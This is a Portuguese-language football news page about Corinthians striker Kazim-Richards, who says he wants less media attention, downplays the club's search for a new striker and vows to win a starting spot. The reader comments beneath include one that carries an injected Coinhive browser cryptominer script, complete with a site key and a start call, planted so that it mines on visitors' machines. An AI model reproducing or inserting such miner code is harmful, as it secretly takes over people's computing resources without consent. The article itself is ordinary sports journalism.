15/1/2018 13:00

Kazim quer "menos mídia", minimiza busca por novo atacante e promete foco para ser titular

Atacante se diz focado em seu futebol e que lutará para seguir no time do Corinthians

Kazim quer
Foto: reprodução

O inglês naturalizado turco Colin Kazim-Richards disse em entrevista coletiva na manhã desta segunda-feira que não se importa com a busca do Corinthians por outro centroavante, mas que lutará para seguir no time titular, como o substituto de Jô, vendido para o Nagoya Grampus, do Japão.



Kazim foi titular nos dois jogos do Corinthians no Torneio da Flórida, contra PSV Eindhoven, da Holanda (empate em 1 a 1), e Glasgow Rangers, da Escócia (vitória dos titulares por 2 a 0, com gol de Kazim, e derrota por 4 a 0 no segundo tempo). Ele está confirmado no time que enfrenta a Ponte Preta, quarta-feira, no Pacaembu, na estreia do Paulistão.

– Joguei em sete, oito grandes clubes. O Corinthians é muito grande. Precisa de opções. Quando você joga num clube desse, precisa. Não fico com isso, só foco no meu time, no meu futebol, em fazer mais gols. Não tem problema buscarem mais um, dois ou três jogadores. Olha agora: tem oito volantes. É o Corinthians, a camisa é forte. Só preciso focar no meu futebol. Menos mídia nessa fase. Preciso focar mais no meu futebol – disse Kazim.

– Você acha que venho aqui para não jogar, para férias? Venho para jogar, o professor acredita no meu futebol. Tem de acreditar em você mesmo, senão é melhor ficar em casa. Se contratar um atacante novo, parabéns, será meu irmão, vamos trabalhar juntos. E vou treinar forte para ser titular, normal. Estou focado no meu futebol. É normal o Corinthians contratar outro atacante, Jô foi embora. Agora tem só eu de centroavante. Dutra pode jogar de lado também – completou.

Kazim lembrou que, em 2017, teve um começo de temporada complicado. Ele acredita estar melhor agora.

– No último ano, me machuquei no começo do Paulista. Agora me sinto muito bem, tenho força, treino muito bem, tenho confiança. E mano, não vou falar nada, preciso fazer. Estou mais focado, mais concentrado, treino mais. Acho que vou fazer um melhor ano.
– Minha característica é de melhorar quando tenho ritmo. Tive dois jogos seguidos, no último ano não fiz (dois jogos seguidos). Jô estava bem, o time estava bem, e sem problema. Agora, entrando bem, treinando bem, o time está bem... graças a Deus posso pegar minha oportunidade. Foi só uma Florida Cup. Preciso continuar no Paulista, vai ser importante. Esse será o primeiro jogo oficial do ano – completou Kazim, referindo-se à partida contra a Ponte Preta, quarta-feira.

Kazim negou que tenha recebido propostas para deixar o Corinthians nesta janela de transferências e explicou o que quis dizer no começo da entrevista com a frase "Quero menos mídia":

– Não sei de proposta, eu queria ficar aqui e fiquei. Preciso jogar. No último ano eu era novo, vocês gostam da minha coletiva porque eu tento falar bem, falo a verdade, agora eu acho que preciso focar mais, tenho oportunidade e preciso pegar com as duas mãos. Não é mal, eu só quero focar mais. Não venho aqui só para fazer mídia, ano passado fiz muita mídia, eu gosto, mas agora preciso pensar mais nisso, a oportunidade está aberta.

Kazim falou também sobre o entrosamento com seus colegas de time:

– Quando você joga na frente com Rodriguinho e Jadson uma chance vai vir (risos). Eles são jogadores absurdos, jogam muito bem. Dois craques. Para jogar à frente deles só preciso pensar. A bola vai chegar, no primeiro minuto pode vir. Foi assim na Flórida, Rangers estava bem, mas quando pegamos ritmo foi um, dois, três e gol. Sim, acho que eles me ajudam muito.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Argentinos Juniors
- Reserva do Corinthians, Carlos Miguel é sondado por clubes do Brasil e da Europa
- Timão escalado para o jogo contra o Juventude









6069 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

vc é muito ruim vaza do timão...

Tem q dar uma chance mtos q hj manda o cara embora mandava o jo tbm c jogar uns 10 jogos e nao vingar é outra historia( vaza Roberto de Andrade fdp)

sai fora muito ruim

Esse não era nei pra ta no Corinthians ainda q ser titular vai embora Kazim e o Roberto de Andrade...

ta certo < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade